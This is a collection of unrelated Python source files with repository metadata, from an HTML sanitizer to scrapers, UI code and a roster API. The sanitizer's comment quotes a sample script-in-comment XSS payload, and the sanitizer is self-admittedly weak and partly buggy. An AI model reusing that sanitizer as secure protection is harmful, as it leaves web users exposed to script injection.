soup = BeautifulSoup(html)
# now strip HTML we don't like.
for tag in soup.findAll():
if tag.name.lower() in blacklist:
# blacklisted tags are removed in their entirety
tag.extract()
elif tag.name.lower() in whitelist:
# tag is allowed. Make sure all the attributes are allowed.
            # bs4 stores attributes as a dict, so iterate over a copy of its items
            for attr, value in list(tag.attrs.items()):
                # allowed attributes are whitelisted per-tag
                if tag.name.lower() in attr_whitelist and \
                   attr.lower() in attr_whitelist[ tag.name.lower() ]:
                    # some attributes contain urls..
                    if attr.lower() in attributes_with_urls:
                        # ..make sure they're nice urls
                        if not re.match(r'(https?|ftp)://', value.lower()):
                            del tag[attr]
                else:
                    # not a whitelisted attribute. Remove it.
                    del tag[attr]
else:
# not a whitelisted tag. I'd like to remove it from the tree
# and replace it with its children. But that's hard. It's much
# easier to just replace it with an empty span tag.
tag.name = "span"
tag.attrs = []
# stringify back again
safe_html = str(soup)
    # HTML comments can contain executable scripts, depending on the browser,
    # so we'll be paranoid and just get rid of all of them, e.g.
    # <!--[if lt IE 7]><script type="text/javascript">h4x0r();</script><![endif]-->
# TODO - I rather suspect that this is the weakest part of the operation..
    safe_html = re.sub(r'(?s)<!--.*?-->', '', safe_html)
return safe_html
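# A rough sketch of the intended behaviour (doctest-style; not from the
# original file): blacklisted tags vanish with their contents, other
# non-whitelisted tags become empty spans, and disallowed attributes are
# stripped.
#
#     >>> sanitize('<p onclick="evil()">hi <script>x()</script></p>')
#     '<p>hi </p>'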
if __name__ == "__main__":
import sys
input_file = open(sys.argv[1])
output_file = open(sys.argv[2], "w")
output_file.write(sanitize(input_file.read()).encode("utf8"))
output_file.close()
| fredzannarbor/pagekicker-community | scripts_python_3/bin/sanitize.py | Python | apache-2.0 | 2,661 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pygesture/ui/templates/new_session_template.ui'
#
# Created by: PyQt5 UI code generator 5.5
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_NewSessionDialog(object):
def setupUi(self, NewSessionDialog):
NewSessionDialog.setObjectName("NewSessionDialog")
NewSessionDialog.setWindowModality(QtCore.Qt.NonModal)
NewSessionDialog.resize(288, 201)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(NewSessionDialog.sizePolicy().hasHeightForWidth())
NewSessionDialog.setSizePolicy(sizePolicy)
NewSessionDialog.setSizeGripEnabled(False)
NewSessionDialog.setModal(True)
self.gridLayout = QtWidgets.QGridLayout(NewSessionDialog)
self.gridLayout.setObjectName("gridLayout")
self.participantLabel = QtWidgets.QLabel(NewSessionDialog)
self.participantLabel.setObjectName("participantLabel")
self.gridLayout.addWidget(self.participantLabel, 0, 0, 1, 1)
self.participantLineEdit = QtWidgets.QLineEdit(NewSessionDialog)
self.participantLineEdit.setObjectName("participantLineEdit")
self.gridLayout.addWidget(self.participantLineEdit, 0, 1, 1, 1)
self.sessionLabel = QtWidgets.QLabel(NewSessionDialog)
self.sessionLabel.setObjectName("sessionLabel")
self.gridLayout.addWidget(self.sessionLabel, 1, 0, 1, 1)
self.sessionLineEdit = QtWidgets.QLineEdit(NewSessionDialog)
self.sessionLineEdit.setObjectName("sessionLineEdit")
self.gridLayout.addWidget(self.sessionLineEdit, 1, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(NewSessionDialog)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.taskComboBox = QtWidgets.QComboBox(NewSessionDialog)
self.taskComboBox.setObjectName("taskComboBox")
self.gridLayout.addWidget(self.taskComboBox, 2, 1, 1, 1)
self.configurationLabel = QtWidgets.QLabel(NewSessionDialog)
self.configurationLabel.setObjectName("configurationLabel")
self.gridLayout.addWidget(self.configurationLabel, 3, 0, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.armRadioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.armRadioButton.setChecked(True)
self.armRadioButton.setObjectName("armRadioButton")
self.configurationGroup = QtWidgets.QButtonGroup(NewSessionDialog)
self.configurationGroup.setObjectName("configurationGroup")
self.configurationGroup.addButton(self.armRadioButton)
self.horizontalLayout.addWidget(self.armRadioButton)
self.legRadioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.legRadioButton.setObjectName("legRadioButton")
self.configurationGroup.addButton(self.legRadioButton)
self.horizontalLayout.addWidget(self.legRadioButton)
self.gridLayout.addLayout(self.horizontalLayout, 3, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(NewSessionDialog)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 4, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.radioButton = QtWidgets.QRadioButton(NewSessionDialog)
self.radioButton.setChecked(True)
self.radioButton.setObjectName("radioButton")
self.handGroup = QtWidgets.QButtonGroup(NewSessionDialog)
self.handGroup.setObjectName("handGroup")
self.handGroup.addButton(self.radioButton)
self.horizontalLayout_3.addWidget(self.radioButton)
self.radioButton_2 = QtWidgets.QRadioButton(NewSessionDialog)
self.radioButton_2.setObjectName("radioButton_2")
self.handGroup.addButton(self.radioButton_2)
self.horizontalLayout_3.addWidget(self.radioButton_2)
self.gridLayout.addLayout(self.horizontalLayout_3, 4, 1, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(NewSessionDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 5, 0, 1, 2)
self.retranslateUi(NewSessionDialog)
self.buttonBox.accepted.connect(NewSessionDialog.accept)
self.buttonBox.rejected.connect(NewSessionDialog.reject)
QtCore.QMetaObject.connectSlotsByName(NewSessionDialog)
NewSessionDialog.setTabOrder(self.participantLineEdit, self.sessionLineEdit)
NewSessionDialog.setTabOrder(self.sessionLineEdit, self.taskComboBox)
NewSessionDialog.setTabOrder(self.taskComboBox, self.armRadioButton)
NewSessionDialog.setTabOrder(self.armRadioButton, self.legRadioButton)
NewSessionDialog.setTabOrder(self.legRadioButton, self.radioButton)
NewSessionDialog.setTabOrder(self.radioButton, self.radioButton_2)
def retranslateUi(self, NewSessionDialog):
_translate = QtCore.QCoreApplication.translate
NewSessionDialog.setWindowTitle(_translate("NewSessionDialog", "New Session"))
self.participantLabel.setText(_translate("NewSessionDialog", "Participant ID:"))
self.sessionLabel.setText(_translate("NewSessionDialog", "Session ID:"))
self.label_3.setText(_translate("NewSessionDialog", "Task:"))
self.configurationLabel.setText(_translate("NewSessionDialog", "Configuration:"))
self.armRadioButton.setText(_translate("NewSessionDialog", "arm"))
self.legRadioButton.setText(_translate("NewSessionDialog", "leg"))
self.label_2.setText(_translate("NewSessionDialog", "Hand:"))
self.radioButton.setText(_translate("NewSessionDialog", "right"))
self.radioButton_2.setText(_translate("NewSessionDialog", "left"))
| ixjlyons/pygesture | pygesture/ui/templates/new_session_template.py | Python | bsd-3-clause | 6,242 |
# This file is a minimal clang-format vim-integration. To install:
# - Change 'binary' if clang-format is not on the path (see below).
# - Add to your .vimrc:
#
# map <C-I> :pyf <path-to-this-file>/clang-format.py<cr>
# imap <C-I> <c-o>:pyf <path-to-this-file>/clang-format.py<cr>
#
# The first line enables clang-format for NORMAL and VISUAL mode, the second
# line adds support for INSERT mode. Change "C-I" to another binding if you
# need clang-format on a different key (C-I stands for Ctrl+i).
#
# With this integration you can press the bound key and clang-format will
# format the current line in NORMAL and INSERT mode or the selected region in
# VISUAL mode. The line or region is extended to the next bigger syntactic
# entity.
#
# You can also pass in the variable "l:lines" to choose the range for
# formatting. This variable can either contain "<start line>:<end line>" or
# "all" to format the full file. So, to format the full file, write a function
# like:
# :function FormatFile()
# : let l:lines="all"
# : pyf <path-to-this-file>/clang-format.py
# :endfunction
#
# It operates on the current, potentially unsaved buffer and does not create
# or save any files. To revert a formatting, just undo.
import difflib
import json
import subprocess
import sys
import vim
# set g:clang_format_path to the path to clang-format if it is not on the path
# Change this to the full path if clang-format is not on the path.
binary = 'clang-format'
if vim.eval('exists("g:clang_format_path")') == "1":
binary = vim.eval('g:clang_format_path')
# Change this to format according to other formatting styles. See the output of
# 'clang-format --help' for a list of supported styles. The default looks for
# a '.clang-format' or '_clang-format' file to indicate the style that should be
# used.
style = '{BasedOnStyle: google, IndentWidth: 4}'
fallback_style = None
if vim.eval('exists("g:clang_format_fallback_style")') == "1":
fallback_style = vim.eval('g:clang_format_fallback_style')
def main():
# Get the current text.
buf = vim.current.buffer
text = '\n'.join(buf)
# Determine range to format.
if vim.eval('exists("l:lines")') == '1':
lines = vim.eval('l:lines')
else:
lines = '%s:%s' % (vim.current.range.start + 1, vim.current.range.end + 1)
# Determine the cursor position.
cursor = int(vim.eval('line2byte(line("."))+col(".")')) - 2
if cursor < 0:
print 'Couldn\'t determine cursor position. Is your file empty?'
return
# Avoid flashing an ugly, ugly cmd prompt on Windows when invoking clang-format.
startupinfo = None
if sys.platform.startswith('win32'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call formatter.
command = [binary, '-style', style, '-cursor', str(cursor)]
if lines != 'all':
command.extend(['-lines', lines])
if fallback_style:
command.extend(['-fallback-style', fallback_style])
if vim.current.buffer.name:
command.extend(['-assume-filename', vim.current.buffer.name])
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE, startupinfo=startupinfo)
stdout, stderr = p.communicate(input=text)
# If successful, replace buffer contents.
if stderr:
print stderr
if not stdout:
print ('No output from clang-format (crashed?).\n' +
'Please report to bugs.llvm.org.')
else:
lines = stdout.split('\n')
output = json.loads(lines[0])
lines = lines[1:]
sequence = difflib.SequenceMatcher(None, vim.current.buffer, lines)
for op in reversed(sequence.get_opcodes()):
      if op[0] != 'equal':
vim.current.buffer[op[1]:op[2]] = lines[op[3]:op[4]]
if output.get('IncompleteFormat'):
print 'clang-format: incomplete (syntax errors)'
vim.command('goto %d' % (output['Cursor'] + 1))
main()
| 8carlosf/dotfiles | vim/.vim/clang-format.py | Python | unlicense | 3,961 |
from utils import url_xpath, State
from .people import MSLegislatorScraper
from .bills import MSBillScraper
# from .committees import MSCommitteeScraper
class Mississippi(State):
scrapers = {
"people": MSLegislatorScraper,
# "committees": MSCommitteeScraper,
"bills": MSBillScraper,
}
legislative_sessions = [
{
"_scraped_name": "2008 Regular Session",
"identifier": "2008",
"name": "2008 Regular Session",
"start_date": "2008-01-08",
"end_date": "2008-04-23",
},
{
"_scraped_name": "2009 Regular Session",
"identifier": "2009",
"name": "2009 Regular Session",
"start_date": "2009-01-06",
"end_date": "2009-04-14",
},
{
"_scraped_name": "2009 First Extraordinary Session",
"identifier": "20091E",
"name": "2009, 1st Extraordinary Session",
"start_date": "2009-05-07",
"end_date": "2009-05-08",
},
{
"_scraped_name": "2009 Second Extraordinary Session",
"identifier": "20092E",
"name": "2009, 2nd Extraordinary Session",
"start_date": "2009-06-28",
"end_date": "2009-06-30",
},
{
"_scraped_name": "2009 Third Extraordinary Session",
"identifier": "20093E",
"name": "2009, 3rd Extraordinary Session",
"start_date": "2009-07-10",
"end_date": "2013-06-27",
},
{
"_scraped_name": "2010 Regular Session",
"identifier": "2010",
"name": "2010 Regular Session",
"start_date": "2010-01-05",
"end_date": "2010-05-03",
},
{
"_scraped_name": "2010 First Extraordinary Session",
"identifier": "20101E",
"name": "2010, 1st Extraordinary Session",
"start_date": "2010-04-22",
"end_date": "2010-05-04",
},
{
"_scraped_name": "2010 Second Extraordinary Session",
"identifier": "20102E",
"name": "2010, 2nd Extraordinary Session",
"start_date": "2010-08-27",
"end_date": "2010-08-31",
},
{
"_scraped_name": "2011 Regular Session",
"identifier": "2011",
"name": "2011 Regular Session",
"start_date": "2011-01-04",
"end_date": "2011-04-07",
},
{
"_scraped_name": "2011 First Extraordinary Session",
"identifier": "20111E",
"name": "2011, 1st Extraordinary Session",
"start_date": "2011-09-02",
"end_date": "2011-09-07",
},
{
"_scraped_name": "2012 Regular Session",
"identifier": "2012",
"name": "2012 Regular Session",
"start_date": "2012-01-03",
"end_date": "2012-04-07",
},
{
"_scraped_name": "2013 Regular Session",
"identifier": "2013",
"name": "2013 Regular Session",
"start_date": "2013-01-08",
"end_date": "2013-04-07",
},
{
"_scraped_name": "2013 First Extraordinary Session",
"identifier": "20131E",
"name": "2013 First Extraordinary Session",
"start_date": "2013-04-26",
"end_date": "2013-04-26",
},
{
"_scraped_name": "2013 Second Extraordinary Session",
"identifier": "20132E",
"name": "2013 Second Extraordinary Session",
"start_date": "2013-06-27",
"end_date": "2013-06-28",
},
{
"_scraped_name": "2014 Regular Session",
"identifier": "2014",
"name": "2014 Regular Session",
"start_date": "2014-01-07",
"end_date": "2014-04-02",
},
{
"_scraped_name": "2014 First Extraordinary Session",
"identifier": "20141E",
"name": "2014 First Extraordinary Session",
"start_date": "2014-04-02",
"end_date": "2014-04-02",
},
{
"_scraped_name": "2014 Second Extraordinary Session",
"identifier": "20142E",
"name": "2014 Second Extraordinary Session",
"start_date": "2014-05-08",
"end_date": "2014-05-08",
},
{
"_scraped_name": "2015 Regular Session",
"identifier": "2015",
"name": "2015 Regular Session",
"start_date": "2015-01-06",
"end_date": "2015-04-02",
},
{
"_scraped_name": "2016 Regular Session",
"classification": "primary",
"identifier": "2016",
"name": "2016 Regular Session",
"start_date": "2016-01-05",
"end_date": "2016-04-21",
},
{
"_scraped_name": "2016 First Extraordinary Session",
"identifier": "20161E",
"name": "2016 First Extraordinary Session",
"start_date": "2016-02-04",
"end_date": "2016-02-04",
},
{
"_scraped_name": "2016 Second Extraordinary Session",
"identifier": "20162E",
"name": "2016 Second Extraordinary Session",
"start_date": "2016-06-28",
"end_date": "2016-06-29",
},
{
"_scraped_name": "2017 Regular Session",
"classification": "primary",
"identifier": "2017",
"name": "2017 Regular Session",
"start_date": "2017-01-03",
"end_date": "2017-03-29",
},
{
"_scraped_name": "2017 First Extraordinary Session",
"classification": "special",
"identifier": "20171E",
"name": "2017 First Extraordinary Session",
"start_date": "2017-06-05",
"end_date": "2017-06-23",
},
{
"_scraped_name": "2018 Regular Session",
"classification": "primary",
"identifier": "2018",
"name": "2018 Regular Session",
"start_date": "2018-01-02",
"end_date": "2018-04-01",
},
{
"_scraped_name": "2018 First Extraordinary Session",
"classification": "special",
"identifier": "20181E",
"name": "2018 First Extraordinary Session",
"start_date": "2018-08-23",
"end_date": "2018-08-29",
},
{
"_scraped_name": "2019 Regular Session",
"classification": "primary",
"identifier": "2019",
"name": "2019 Regular Session",
"start_date": "2019-01-08",
"end_date": "2019-03-05",
},
{
"_scraped_name": "2020 Regular Session",
"classification": "primary",
"identifier": "2020",
"name": "2020 Regular Session",
"start_date": "2020-01-07",
"end_date": "2020-05-10",
},
]
ignored_scraped_sessions = [
"2008 First Extraordinary Session",
"2007 Regular Session",
"2007 First Extraordinary Session",
"2006 Regular Session",
"2006 First Extraordinary Session",
"2006 Second Extraordinary Session",
"2005 Regular Session",
"2005 First Extraordinary Session",
"2005 Second Extraordinary Session",
"2005 Third Extraordinary Session",
"2005 Fourth Extraordinary Session",
"2005 Fifth Extraordinary Session",
"2004 Regular Session",
"2004 First Extraordinary Session",
"2004 Second Extraordinary Session",
"2004 Third Extraordinary Session",
"2003 Regular Session",
"2002 Regular Session",
"2002 First Extraordinary Session",
"2002 Second Extraordinary Session",
"2002 Third Extraordinary Session",
"2001 Regular Session",
"2001 First Extraordinary Session",
"2001 Second Extraordinary Session",
"2000 Regular Session",
"2000 First Extraordinary Session",
"2000 Second Extraordinary Session",
"2000 Third Extraordinary Session",
"1999 Regular Session",
"1998 Regular Session",
"1997 Regular Session",
]
def get_session_list(self):
return url_xpath("http://billstatus.ls.state.ms.us/sessions.htm", "//a/text()")
| sunlightlabs/openstates | scrapers/ms/__init__.py | Python | gpl-3.0 | 8,618 |
# django-websockets doesn't have any models
| samuelcolvin/django-websockets | django_websockets/models.py | Python | mit | 44 |
# -*- coding: utf-8 -*-
#
# File: infofolder.py
#
# Copyright (c) 2016 by Bundesamt für Strahlenschutz
# Generator: ConPD2
# http://www.condat.de
#
__author__ = ''
__docformat__ = 'plaintext'
"""Definition of the InfoFolder content type. See infofolder.py for more
explanation on the statements below.
"""
from AccessControl import ClassSecurityInfo
from docpool.base.content.folderbase import FolderBase
from docpool.base.content.folderbase import IFolderBase
from plone.dexterity.content import Container
from Products.CMFPlone.utils import base_hasattr
from plone.supermodel import model
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import log
from Products.CMFPlone.utils import log_exc
from zExceptions import BadRequest
from zope.interface import implementer
class IInfoFolder(model.Schema, IFolderBase):
"""
"""
@implementer(IInfoFolder)
class InfoFolder(Container, FolderBase):
"""
"""
security = ClassSecurityInfo()
def createActions(self):
"""
"""
if base_hasattr(self, "myGroupFolder"):
log("Creating Private Info Folder")
placeful_wf = getToolByName(self, 'portal_placeful_workflow')
try:
self.manage_addProduct[
'CMFPlacefulWorkflow'
].manage_addWorkflowPolicyConfig()
except BadRequest as e:
log_exc(e)
config = placeful_wf.getWorkflowPolicyConfig(self)
placefulWfName = 'dp-private-infofolder'
config.setPolicyIn(policy=placefulWfName, update_security=False)
config.setPolicyBelow(policy=placefulWfName, update_security=False)
self.reindexObject()
self.updateSecurity()
self.reindexObjectSecurity()
def myInfoFolder(self):
"""
"""
return self
def getFirstChild(self):
"""
"""
fc = self.getFolderContents()
if len(fc) > 0:
return fc[0].getObject()
else:
return None
def getAllContentObjects(self):
"""
"""
return [obj.getObject() for obj in self.getFolderContents()]
def getInfoDocuments(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoDocument'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
def getInfoFolders(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoFolder'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
def getInfoLinks(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoLink'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
| OpenBfS/dokpool-plone | Plone/src/docpool.base/docpool/base/content/infofolder.py | Python | gpl-3.0 | 2,843 |
# Copyright (c) 2013 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convenient way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
        # Don't log the complete output: bitbake -e output is really big
        # and would make the log file useless.
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
return result
def bitbake(command, ignore_status=False, timeout=None, **options):
if isinstance(command, basestring):
cmd = "bitbake " + command
else:
cmd = [ "bitbake" ] + command
return runCmd(cmd, ignore_status, timeout, **options)
def get_bb_env(target=None):
if target:
return runCmd("bitbake -e %s" % target).output
else:
return runCmd("bitbake -e").output
def get_bb_var(var, target=None):
val = None
bbenv = get_bb_env(target)
for line in bbenv.splitlines():
if line.startswith(var + "="):
val = line.split('=')[1]
val = val.replace('\"','')
break
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
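# Minimal usage sketch (not part of the original module; assumes a configured
# bitbake build environment on PATH):
#
#     result = runCmd("echo hello")
#     print result.output
#     distro = get_bb_var("DISTRO_VERSION")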
| marcosbontempo/inatelos | poky-daisy/meta/lib/oeqa/utils/commands.py | Python | mit | 3,796 |
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from urllib.parse import unquote
from falcon import HTTPError, HTTPNotFound, HTTPBadRequest
from ujson import dumps as json_dumps
from ...auth import login_required, check_team_auth
from ... import db
from ...utils import load_json_body, invalid_char_reg
from .schedules import get_schedules
from ...constants import ROSTER_DELETED, ROSTER_EDITED
from ...utils import create_audit
def on_get(req, resp, team, roster):
"""
Get user and schedule info for a roster
**Example request**:
.. sourcecode:: http
       GET /api/v0/teams/foo-sre/rosters/Managers HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"Managers": {
"id": 2730,
"users": [
{
"in_rotation": true,
"name": "foo"
}
],
"schedules": [
{
"auto_populate_threshold": 0,
"roster": "Managers",
"advanced_mode": 0,
"role": "manager",
"team": "foo-sre",
"events": [
{
"duration": 604800,
"start": 367200
}
],
"id": 1704
}
]
}
}
:statuscode 200: no error
"""
team, roster = unquote(team), unquote(roster)
connection = db.connect()
cursor = connection.cursor(db.DictCursor)
cursor.execute('''SELECT `roster`.`id` AS `roster`, `team`.`id` AS `team` FROM `roster`
JOIN `team` ON `team`.`id`=`roster`.`team_id`
WHERE `team`.`name`=%s AND `roster`.`name`=%s''',
(team, roster))
results = cursor.fetchall()
if not results:
raise HTTPNotFound()
team_id = results[0]['team']
roster_id = results[0]['roster']
# get list of users in the roster
cursor.execute('''SELECT `user`.`name` as `name`,
`roster_user`.`in_rotation` AS `in_rotation`,
`roster_user`.`roster_priority`
FROM `roster_user`
JOIN `user` ON `roster_user`.`user_id`=`user`.`id`
WHERE `roster_user`.`roster_id`=%s''', roster_id)
users = [user for user in cursor]
# get list of schedule in the roster
schedules = get_schedules({'team_id': team_id}, dbinfo=(connection, cursor))
cursor.close()
connection.close()
resp.body = json_dumps({'users': users, 'schedules': schedules})
@login_required
def on_put(req, resp, team, roster):
"""
Change roster name. Must have team admin privileges.
**Example request:**
.. sourcecode:: http
PUT /api/v0/teams/team-foo/rosters/roster-foo HTTP/1.1
Content-Type: application/json
{
"name": "roster-bar",
}
:statuscode 400: Invalid roster name, disallowed characters
:statuscode 422: Duplicate roster name for team
"""
team, roster = unquote(team), unquote(roster)
data = load_json_body(req)
name = data.get('name')
roster_order = data.get('roster_order')
check_team_auth(team, req)
if not (name or roster_order):
raise HTTPBadRequest('invalid roster update', 'missing roster name or order')
connection = db.connect()
cursor = connection.cursor()
try:
if roster_order:
cursor.execute('''SELECT `user`.`name` FROM `roster_user`
JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
JOIN `user` ON `roster_user`.`user_id` = `user`.`id`
WHERE `roster_id` = (SELECT id FROM roster WHERE name = %s
AND team_id = (SELECT id from team WHERE name = %s))''',
(roster, team))
roster_users = {row[0] for row in cursor}
if not all([x in roster_users for x in roster_order]):
raise HTTPBadRequest('Invalid roster order', 'All users in provided order must be part of the roster')
if not len(roster_order) == len(roster_users):
raise HTTPBadRequest('Invalid roster order', 'Roster order must include all roster members')
cursor.executemany('''UPDATE roster_user SET roster_priority = %s
WHERE roster_id = (SELECT id FROM roster WHERE name = %s
AND team_id = (SELECT id FROM team WHERE name = %s))
AND user_id = (SELECT id FROM user WHERE name = %s)''',
((idx, roster, team, user) for idx, user in enumerate(roster_order)))
connection.commit()
if name and name != roster:
invalid_char = invalid_char_reg.search(name)
if invalid_char:
raise HTTPBadRequest('invalid roster name',
'roster name contains invalid character "%s"' % invalid_char.group())
cursor.execute(
'''UPDATE `roster` SET `name`=%s
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `name`=%s''',
(name, team, roster))
create_audit({'old_name': roster, 'new_name': name}, team, ROSTER_EDITED, req, cursor)
connection.commit()
except db.IntegrityError as e:
err_msg = str(e.args[1])
if 'Duplicate entry' in err_msg:
err_msg = "roster '%s' already existed for team '%s'" % (name, team)
raise HTTPError('422 Unprocessable Entity', 'IntegrityError', err_msg)
finally:
cursor.close()
connection.close()
@login_required
def on_delete(req, resp, team, roster):
"""
Delete roster
"""
team, roster = unquote(team), unquote(roster)
check_team_auth(team, req)
connection = db.connect()
cursor = connection.cursor()
cursor.execute('SELECT `user_id` FROM `roster_user` JOIN `roster` ON `roster_user`.`roster_id` = `roster`.`id` '
'WHERE `roster`.`name` = %s AND `team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)',
(roster, team))
user_ids = cursor.fetchall()
cursor.execute('DELETE FROM `roster_user` WHERE `roster_id` = (SELECT `id` FROM `roster` WHERE `name` = %s '
'AND `team_id` = (SELECT `id` FROM `team` WHERE `name` = %s))', (roster, team))
if user_ids:
# Remove users from the team if needed
query = '''DELETE FROM `team_user` WHERE `user_id` IN %s AND `user_id` NOT IN
(SELECT `roster_user`.`user_id`
FROM `roster_user` JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
WHERE team_id = (SELECT `id` FROM `team` WHERE `name`=%s)
UNION
(SELECT `user_id` FROM `team_admin`
WHERE `team_id` = (SELECT `id` FROM `team` WHERE `name`=%s)))
AND `team_user`.`team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)'''
cursor.execute(query, (user_ids, team, team, team))
cursor.execute('''DELETE FROM `roster`
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `name`=%s''',
(team, roster))
deleted = cursor.rowcount
if deleted:
create_audit({'name': roster}, team, ROSTER_DELETED, req, cursor)
connection.commit()
cursor.close()
connection.close()
if deleted == 0:
raise HTTPNotFound()
| diegocepedaw/oncall | src/oncall/api/v0/roster.py | Python | bsd-2-clause | 7,890 |
# Test the module type
from test.test_support import verify, vereq, verbose, TestFailed
from types import ModuleType as module
# An uninitialized module has no __dict__ or __name__, and __doc__ is None
foo = module.__new__(module)
verify(foo.__dict__ is None)
try:
s = foo.__name__
except AttributeError:
pass
else:
raise TestFailed, "__name__ = %s" % repr(s)
# __doc__ is None by default in CPython but not in Jython.
# We're not worrying about that now.
#vereq(foo.__doc__, module.__doc__)
try:
foo_dir = dir(foo)
except TypeError:
pass
else:
raise TestFailed, "__dict__ = %s" % repr(foo_dir)
try:
del foo.somename
except AttributeError:
pass
else:
raise TestFailed, "del foo.somename"
try:
del foo.__dict__
except TypeError:
pass
else:
raise TestFailed, "del foo.__dict__"
try:
foo.__dict__ = {}
except TypeError:
pass
else:
raise TestFailed, "foo.__dict__ = {}"
verify(foo.__dict__ is None)
# Regularly initialized module, no docstring
foo = module("foo")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, None)
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": None})
# ASCII docstring
foo = module("foo", "foodoc")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, "foodoc")
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": "foodoc"})
# Unicode docstring
foo = module("foo", u"foodoc\u1234")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, u"foodoc\u1234")
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": u"foodoc\u1234"})
# Reinitialization should not replace the __dict__
foo.bar = 42
d = foo.__dict__
foo.__init__("foo", "foodoc")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, "foodoc")
vereq(foo.bar, 42)
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": "foodoc", "bar": 42})
verify(foo.__dict__ is d)
if verbose:
print "All OK"
| adaussy/eclipse-monkey-revival | plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_module.py | Python | epl-1.0 | 1,896 |
import numpy as np
import pickle
from scipy.spatial.distance import cosine
from numpy.linalg import norm
from scipy.sparse import csr_matrix
class Recommender:
keywords = None
content_vectors = None
user_preference_vectors = None
user_visited_content = None
USER_CONTENT_DUMP = 'user_content.dat'
KEYWORDS_DUMP = 'keywords_vec.dat'
CONTENT_VEC_DUMP = 'content_vec.dat'
USER_PREF_VEC_DUMP = 'user_pref_vec.dat'
def set_keywords(self, keywords_list):
self.keywords = keywords_list
pickle.dump(self.keywords, open(self.KEYWORDS_DUMP, "wb"))
def get_keywords(self):
if self.keywords is None:
try:
self.keywords = pickle.load(open(self.KEYWORDS_DUMP, "rb"))
except Exception:
self.keywords = []
return self.keywords
